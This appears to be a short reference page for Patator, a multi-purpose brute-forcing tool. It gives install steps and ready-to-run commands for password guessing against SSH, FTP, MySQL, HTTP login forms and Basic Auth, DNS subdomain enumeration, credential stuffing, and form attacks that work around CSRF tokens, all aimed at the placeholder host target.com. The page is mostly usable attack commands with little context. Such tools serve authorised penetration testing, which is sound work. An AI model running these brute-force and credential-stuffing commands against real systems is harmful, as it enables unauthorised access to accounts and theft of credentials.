Description
Patator is a multi-purpose brute-forcer with a modular design. It supports brute forcing SSH, FTP, HTTP, SMTP, MySQL, MSSQL, PostgreSQL, VNC, DNS, and many more protocols. Its flexible syntax allows complex attack scenarios.
Installation
BASH
# pip
pip3 install patator
# Kali (pre-installed)
patator -h
# Docker
docker run --rm -it patator ssh_login host=target.com user=admin password=FILE0 0=passwords.txtBasic Usage
BASH
# SSH brute force
patator ssh_login host=target.com user=admin password=FILE0 0=passwords.txt
# FTP brute force
patator ftp_login host=target.com user=admin password=FILE0 0=passwords.txt
# HTTP POST login
patator http_fuzz url="https://target.com/login" method=POST \
body="user=admin&pass=FILE0" 0=passwords.txt \
-x ignore:fgrep="Invalid credentials"Advanced Usage
BASH
# HTTP Basic Auth
patator http_fuzz url="https://target.com/admin" \
user_pass="admin:FILE0" 0=passwords.txt \
-x ignore:code=401
# MySQL brute force
patator mysql_login host=target.com user=root password=FILE0 0=passwords.txt
# DNS brute force
patator dns_forward name=FILE0.target.com 0=subdomains.txt -x ignore:code=NXDOMAIN
# Multiple users and passwords
patator ssh_login host=target.com user=FILE0 password=FILE1 \
0=users.txt 1=passwords.txt
# Rate limiting
patator ssh_login host=target.com user=admin password=FILE0 \
0=passwords.txt --rate-limit=1Common Workflows
BASH
# Credential stuffing against SSH
patator ssh_login host=target.com user=FILE0 password=FILE1 \
0=users.txt 1=passwords.txt -x ignore:mesg="Authentication failed"
# Web form brute force with CSRF token handling
patator http_fuzz url="https://target.com/login" method=POST \
body="user=admin&pass=FILE0&csrf=TOKEN" 0=passwords.txt \
before_urls="https://target.com/login" before_egrep="csrf.*value=\"(.*?)\"" \
-x ignore:fgrep="Invalid"